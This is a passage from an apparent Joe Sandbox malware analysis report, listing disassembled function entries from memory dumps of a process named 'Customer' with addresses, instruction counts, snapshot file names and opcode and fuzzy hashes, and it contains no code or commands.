                                                                                                      Function 00007FFD9B9809BD Relevance: 1.3, Instructions: 1311COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4e8cd80dabd88b4d7f36e7e29930e85339b403b008a08c109b929312be8c4098
                                                                                                      • Instruction ID: b73846e4bc9b9dab3c398a7d37d86c399bf68bf250e8ae6f1777e2b18ed3e4c9
                                                                                                      • Opcode Fuzzy Hash: 4e8cd80dabd88b4d7f36e7e29930e85339b403b008a08c109b929312be8c4098
                                                                                                      • Instruction Fuzzy Hash: B9924130B199198FDBA8EB6CD465A6873E2FF58704F5101B9E01EC72E6DE39EC418B41
                                                                                                      Function 00007FFD9BA51461 Relevance: 2.9, Strings: 2, Instructions: 393COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781717309.00007FFD9BA50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba50000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 'B_H$I
                                                                                                      • API String ID: 0-2589410330
                                                                                                      • Opcode ID: a45540701fbae5fe7bb0ed91d9a0bdebac800795a2ac476fb5a846e9de850759
                                                                                                      • Instruction ID: 6194e3428501eb4a49fd1a942c3829e939416277ea94b555aad9219a29fb1459
                                                                                                      • Opcode Fuzzy Hash: a45540701fbae5fe7bb0ed91d9a0bdebac800795a2ac476fb5a846e9de850759
                                                                                                      • Instruction Fuzzy Hash: C0C13961B0F7C91FD76697A858655B43FE1EF67210B0E01FBD089CB0A3DAA8AE05C351
                                                                                                      Function 00007FFD9B9906A3 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: N_^
                                                                                                      • API String ID: 0-884294832
                                                                                                      • Opcode ID: f144f151a17d689fa47eb8e48cf43bbdb3380b746505d99d10e7155d85195358
                                                                                                      • Instruction ID: b42be7a44cf1d476b7e99a56061b80a7635a5dfcd686901b2c9bc69dcb4f3073
                                                                                                      • Opcode Fuzzy Hash: f144f151a17d689fa47eb8e48cf43bbdb3380b746505d99d10e7155d85195358
                                                                                                      • Instruction Fuzzy Hash: 9831D463B0F6CB1FF7A24B68587A0947FA0EF5263470A16B7C4F44B4A3DE0A75168641
                                                                                                      Function 00007FFD9BA515AE Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781717309.00007FFD9BA50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba50000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: I
                                                                                                      • API String ID: 0-3707901625
                                                                                                      • Opcode ID: e7d06adbed8a915a9516df7b56105e857b1015e659c813cedbafafa547aaaadf
                                                                                                      • Instruction ID: d30560f132d67953132854dc51e1f91e45d2c56292317c01c517fd9f873470ad
                                                                                                      • Opcode Fuzzy Hash: e7d06adbed8a915a9516df7b56105e857b1015e659c813cedbafafa547aaaadf
                                                                                                      • Instruction Fuzzy Hash: F2F04623B0FA860FEB6687DC64910B877D2EF912B070401BBE59EC3193DD6879468391
                                                                                                      Function 00007FFD9BA544A0 Relevance: .6, Instructions: 639COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781717309.00007FFD9BA50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba50000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: dd935868f15afd179a7f788c1a0c8443946cec16cfe08a8067beffbb71981277
                                                                                                      • Instruction ID: 517346eaec8c6ad4e359a6781e4d22da02d8f9eddfead27920580a731d871183
                                                                                                      • Opcode Fuzzy Hash: dd935868f15afd179a7f788c1a0c8443946cec16cfe08a8067beffbb71981277
                                                                                                      • Instruction Fuzzy Hash: 76028C22B0EBC90FE3A597A858656B87BD1DF56210B0A01FFD04DC71F7DD99AE068341
                                                                                                      Function 00007FFD9B987F88 Relevance: .5, Instructions: 531COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 594b955cc8a34832acb9aa58b1844082ca8ae464b39da862123be0744785e9c4
                                                                                                      • Instruction ID: d66e4d1d954f3a435380fbd898a3f0cd9182694e80ef704500750a0221a0cca5
                                                                                                      • Opcode Fuzzy Hash: 594b955cc8a34832acb9aa58b1844082ca8ae464b39da862123be0744785e9c4
                                                                                                      • Instruction Fuzzy Hash: CE02B231A18E4D8FDB98EF58C495AE9B7E1FFA8300F154169D00DD72A6CA35F881CB81
                                                                                                      Function 00007FFD9B986F60 Relevance: .5, Instructions: 505COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6b3fa8c54bd542ffbcfbc3a1ea7b6a1e60aec19dc6a716cbf639cda3eae3e695
                                                                                                      • Instruction ID: be16c6d6e3fccd6a8afbd089fe8cc653150f9b9d11d638056bc849c67cc8ce2b
                                                                                                      • Opcode Fuzzy Hash: 6b3fa8c54bd542ffbcfbc3a1ea7b6a1e60aec19dc6a716cbf639cda3eae3e695
                                                                                                      • Instruction Fuzzy Hash: 10F1D231B19A4D8FDB98EF9CD451AA977E1FF68300F1541AAD40DC72A6CA39EC81C781
                                                                                                      Function 00007FFD9B9866F3 Relevance: .5, Instructions: 453COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 38b9f5cfa7e3168c881738a083a9e4c57e835a093986599bb41f1f4b2dc62f72
                                                                                                      • Instruction ID: 13e32a411a1a2ad233b0887f9e64336d6621a865ae8ff547f15a5482f52b80f6
                                                                                                      • Opcode Fuzzy Hash: 38b9f5cfa7e3168c881738a083a9e4c57e835a093986599bb41f1f4b2dc62f72
                                                                                                      • Instruction Fuzzy Hash: 75E1E431A18A4D8FDB98DF5CC491AA97BF1FFA8310F15417AD04DD7296CA35E842CB81
                                                                                                      Function 00007FFD9B980678 Relevance: .3, Instructions: 340COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8d1c7b4b90a50e17f879e833c3610a27b88cd68ba0d23d4a6b1f1f7b0b1fced3
                                                                                                      • Instruction ID: ffe9e45160db01e5f49d754a3d3b1f92233a0a9b39daf56f7569daaffb5f9a67
                                                                                                      • Opcode Fuzzy Hash: 8d1c7b4b90a50e17f879e833c3610a27b88cd68ba0d23d4a6b1f1f7b0b1fced3
                                                                                                      • Instruction Fuzzy Hash: 65A1A063B0FAC91FE325A76828795F53B91EF8165470801FBD09DCB1E7EC25694A8381
                                                                                                      Function 00007FFD9B982CFA Relevance: .3, Instructions: 320COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b98ab3d92d67247265b8da559dc3d2e616298078d328db6b1111b668b0418b94
                                                                                                      • Instruction ID: 51d64544a55a2b259ad55dec8a62e78669a36af3cc9264ffbb5b01f532a1b2e6
                                                                                                      • Opcode Fuzzy Hash: b98ab3d92d67247265b8da559dc3d2e616298078d328db6b1111b668b0418b94
                                                                                                      • Instruction Fuzzy Hash: 7F818E21B1EE8E0FE768A7AC68215F53BD1EF95310B0501BFE49EC71E3DD24A8068341
                                                                                                      Function 00007FFD9B991670 Relevance: .3, Instructions: 259COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 222767bf64a86f260cb22a29f57f488ce2ab2c240b71c570d81d4d46ede2baf7
                                                                                                      • Instruction ID: d25827e88088284cdb10afea47a50910a55f8407700789059ec4944b9f3df198
                                                                                                      • Opcode Fuzzy Hash: 222767bf64a86f260cb22a29f57f488ce2ab2c240b71c570d81d4d46ede2baf7
                                                                                                      • Instruction Fuzzy Hash: 6C914831A2EB9A6FE7A5D76884616A477E0FF45318F0A01FAC05DCB1E3CA28A9458741
                                                                                                      Function 00007FFD9B992945 Relevance: .3, Instructions: 255COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: de148a82d7c28d2d971d50b816b7304a1861ca46950b64fd92878687a88efd66
                                                                                                      • Instruction ID: 104c5b9478cef6d162bc2c3938f688803961b54cdc24bc54871cf6389223f23c
                                                                                                      • Opcode Fuzzy Hash: de148a82d7c28d2d971d50b816b7304a1861ca46950b64fd92878687a88efd66
                                                                                                      • Instruction Fuzzy Hash: 54816932A0EB8C4FE759DFA898651A87FA0EF55310F0441BBD08C87197CA24AD45C781
                                                                                                      Function 00007FFD9B990C48 Relevance: .2, Instructions: 241COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1c6c0697f662e56c74981e01753b142abca345a36ace3b1fb24155f3b2a32752
                                                                                                      • Instruction ID: e616e0c1533071144eb362412dd1817e0363d70bae733e6754d444eda2cdfe8e
                                                                                                      • Opcode Fuzzy Hash: 1c6c0697f662e56c74981e01753b142abca345a36ace3b1fb24155f3b2a32752
                                                                                                      • Instruction Fuzzy Hash: 30814F30629E099FD7A8EF28C0A5A6573E2FF99300B51497CD44EC76A6CB35F945CB40
                                                                                                      Function 00007FFD9B9807B0 Relevance: .2, Instructions: 218COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4531cfb8b54fb193ff66fa1e6d93283ae0bc4bfaac1dceb0a16c93230889d25d
                                                                                                      • Instruction ID: 485fc1ca16b2a60c8396174d47b01341c96f3e6b8b473c837c4e1f22dd2ff222
                                                                                                      • Opcode Fuzzy Hash: 4531cfb8b54fb193ff66fa1e6d93283ae0bc4bfaac1dceb0a16c93230889d25d
                                                                                                      • Instruction Fuzzy Hash: D3518D63B1FEC91FE365976828392B53B91EF95750B0900BBD08CC71E7DD256E458382
                                                                                                      Function 00007FFD9BA54708 Relevance: .2, Instructions: 204COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781717309.00007FFD9BA50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba50000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 41e133c2f758cc1282e3afe89c32595e6316ce8d2b10fad141c57fcca1553e7c
                                                                                                      • Instruction ID: e7ecb1f51069bfce776b85348b6986e1a14cfaef8debeddaa5ed8f5343293aad
                                                                                                      • Opcode Fuzzy Hash: 41e133c2f758cc1282e3afe89c32595e6316ce8d2b10fad141c57fcca1553e7c
                                                                                                      • Instruction Fuzzy Hash: 80512822B0EBC90FE7F59BA818601B837D1EF96650F0A01BED45DC71F6DD99AE028341
                                                                                                      Function 00007FFD9B990AAF Relevance: .2, Instructions: 175COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2bd3d3faab705f686f1d9fb113c6741ef82a68c9e70d953f3bcd65de20296bca
                                                                                                      • Instruction ID: 663ffcf46788e3d04346ebacecfb866230d3f2555d7c1d311d6c64bc43dd6388
                                                                                                      • Opcode Fuzzy Hash: 2bd3d3faab705f686f1d9fb113c6741ef82a68c9e70d953f3bcd65de20296bca
                                                                                                      • Instruction Fuzzy Hash: 32511B30719D098FEBA8EB2CC0A5A6573E2FF99301B1544B9E45EC72A6CE35EC418B40
                                                                                                      Function 00007FFD9BA546F1 Relevance: .2, Instructions: 171COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781717309.00007FFD9BA50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba50000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f3ac86c816218c01606541a438b54eb9abbd6c5f0dace52ef0dbc664d825274e
                                                                                                      • Instruction ID: 2a153ab6958632cd25508016b7d59f2a1e4736848ec0ce62411faadfd60f2819
                                                                                                      • Opcode Fuzzy Hash: f3ac86c816218c01606541a438b54eb9abbd6c5f0dace52ef0dbc664d825274e
                                                                                                      • Instruction Fuzzy Hash: 3551F822B0EACA0FE7F5DB9818601B837D1EFA6210B0A01BED55DC71F7DD95AE068341
                                                                                                      Function 00007FFD9B990A45 Relevance: .2, Instructions: 168COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: de1119bb2793f3b172c98d8994a83e802642d55500ab704bf7b8251bcf136717
                                                                                                      • Instruction ID: b5f0721c3432abfac715f495ffdb41c9e52090982811ebff48055e9542252db4
                                                                                                      • Opcode Fuzzy Hash: de1119bb2793f3b172c98d8994a83e802642d55500ab704bf7b8251bcf136717
                                                                                                      • Instruction Fuzzy Hash: 13513F30719D099FEBA8EB6CC0A5A6573E2FF99301B1544BDE05EC72A2CE35E941CB41
                                                                                                      Function 00007FFD9B986FC5 Relevance: .1, Instructions: 136COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a84c838e159115cbb8ecca6a1408abf92110483e9b603faff1930e470a328eea
                                                                                                      • Instruction ID: f856b1361ee16f2baa1ec5a29efa3565034a19dc99442c3efc569a100d28ffee
                                                                                                      • Opcode Fuzzy Hash: a84c838e159115cbb8ecca6a1408abf92110483e9b603faff1930e470a328eea
                                                                                                      • Instruction Fuzzy Hash: 2931153271EE881FE71D9A5C98659747BD1EF5635071500BEE489CB2A3D82AFC42C782
                                                                                                      Function 00007FFD9B9884BD Relevance: .1, Instructions: 136COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 02b7faf3dce8a5ed64d075f77a320df6020be28b84ca1bd97d465c9d722153bf
                                                                                                      • Instruction ID: c1a83a8ce3a3e41e4402a617b670df9654a0d8fa374cf50d1b09ad78fdde637a
                                                                                                      • Opcode Fuzzy Hash: 02b7faf3dce8a5ed64d075f77a320df6020be28b84ca1bd97d465c9d722153bf
                                                                                                      • Instruction Fuzzy Hash: 8B41257090E7889FDB55DBA888556F97FF4EF56321F0840AFE08CC70A3D6285846C762
                                                                                                      Function 00007FFD9B86F100 Relevance: .1, Instructions: 125COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781013471.00007FFD9B86D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B86D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b86d000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c0a49c1ad7eac83ab990772cdd932c1f60b229f06797a2608c7fca90a3288bec
                                                                                                      • Instruction ID: 5c1d52c1546dd3b201164fad77ca414940d3cf43dcbc056918ec2b38467ceb26
                                                                                                      • Opcode Fuzzy Hash: c0a49c1ad7eac83ab990772cdd932c1f60b229f06797a2608c7fca90a3288bec
                                                                                                      • Instruction Fuzzy Hash: 3241067140EBC48FD7578B3898519623FF0EF56260B1A05EFD088CB1A7D625E84AC7A2
                                                                                                      Function 00007FFD9B98C86D Relevance: .1, Instructions: 123COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 885dbca71a38d13c705141a4fdde674bd350d6b49f12dd9aef3d65038f772550
                                                                                                      • Instruction ID: 27b09e420d256632b112ddb73ab68ee8f563bf1318a9c1c70b60f863c38c00dd
                                                                                                      • Opcode Fuzzy Hash: 885dbca71a38d13c705141a4fdde674bd350d6b49f12dd9aef3d65038f772550
                                                                                                      • Instruction Fuzzy Hash: 1C31E630A1CB4C9FDB189B5CA806AE97BF0EB59310F00426FE44DC3292CA35B855CBD2
                                                                                                      Function 00007FFD9BA5096E Relevance: .1, Instructions: 114COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781717309.00007FFD9BA50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba50000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 14419820b602a1dc1a7ee0316e8f0faff24f03e2a22e95f1b56d8e633300fa44
                                                                                                      • Instruction ID: 57e3ac32ccca0c4012aafbcec980ce24f6247148bb04b9654f4cfc35a792fec5
                                                                                                      • Opcode Fuzzy Hash: 14419820b602a1dc1a7ee0316e8f0faff24f03e2a22e95f1b56d8e633300fa44
                                                                                                      • Instruction Fuzzy Hash: 85316722B0EA5D4FEBB9DBAC58606BDB3D1EF56610B0900BBC14AC3197DA44EA01C385
                                                                                                      Function 00007FFD9B9858CC Relevance: .1, Instructions: 113COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: dcf9f2b6a5ebeffb6fa27d7d2a7b442998b9d4c7e1e8c0c5e014579e3aa4c145
                                                                                                      • Instruction ID: 850f9c6f28a8b1c8fec9b2434de1bff50e4fd5a23f3b0fb69ad3f4b4fb3333fd
                                                                                                      • Opcode Fuzzy Hash: dcf9f2b6a5ebeffb6fa27d7d2a7b442998b9d4c7e1e8c0c5e014579e3aa4c145
                                                                                                      • Instruction Fuzzy Hash: FC212621B1FE8E1FDB95E76C446466577E0EF6925074600FBD05CCB2A3DD28EC0A8700
                                                                                                      Function 00007FFD9B981821 Relevance: .1, Instructions: 111COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 89f4e50d61e169346ed6be4ee28b85882a4fae1af567519952d445e4fb9a8967
                                                                                                      • Instruction ID: 736b6c6800e62d2d3073ea053d6090fb67ff6058322dc4f2bf58bda0f37a41eb
                                                                                                      • Opcode Fuzzy Hash: 89f4e50d61e169346ed6be4ee28b85882a4fae1af567519952d445e4fb9a8967
                                                                                                      • Instruction Fuzzy Hash: F4419C6054EBC21FD323477488617817FA19F43168F1E02DAD0D5CA5F7D6EE948AC322
                                                                                                      Function 00007FFD9B98D30D Relevance: .1, Instructions: 110COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 46d3a43634c64496731c27d9d0c388dc10198840d0b847b7958a0d7774e4dc74
                                                                                                      • Instruction ID: cf2703e527ede1a896ec5a2d0f03d02be6d624b744181899fda7ca7f268229af
                                                                                                      • Opcode Fuzzy Hash: 46d3a43634c64496731c27d9d0c388dc10198840d0b847b7958a0d7774e4dc74
                                                                                                      • Instruction Fuzzy Hash: E731276272EE8E5FE7A9E72C94606E97790EF64354F1402BFD06EC31D6DE2479058340
                                                                                                      Function 00007FFD9B98E0DC Relevance: .1, Instructions: 100COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 667d15e687519be1bb8611734258a7779a2eb231d45ca87e417274936777f0f0
                                                                                                      • Instruction ID: a5b0dd0103c20763f045f0d2d2c75d0da1b2d6f617e7a6b5368f1b3029296143
                                                                                                      • Opcode Fuzzy Hash: 667d15e687519be1bb8611734258a7779a2eb231d45ca87e417274936777f0f0
                                                                                                      • Instruction Fuzzy Hash: 9C210A3190CB4C4FEB59DFAC984A7E97BF0EB56330F04426BD048C31A6DA74945ACB91
                                                                                                      Function 00007FFD9B986AB9 Relevance: .1, Instructions: 82COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f003a25a162f5e31b08981bf5a1dbe9262d8375028b80de36496b697052b5ba3
                                                                                                      • Instruction ID: ce3ea8c93f0a0b3e0f93e07f97ec775dc292f23ee9f8c6dfdaf0f07aafac7fee
                                                                                                      • Opcode Fuzzy Hash: f003a25a162f5e31b08981bf5a1dbe9262d8375028b80de36496b697052b5ba3
                                                                                                      • Instruction Fuzzy Hash: 4A213931A2C94D8FDF98EF98D451EE9B7A1EF68304F550169D00AD7296CA35EC82CBC1
                                                                                                      Function 00007FFD9B989B4D Relevance: .1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
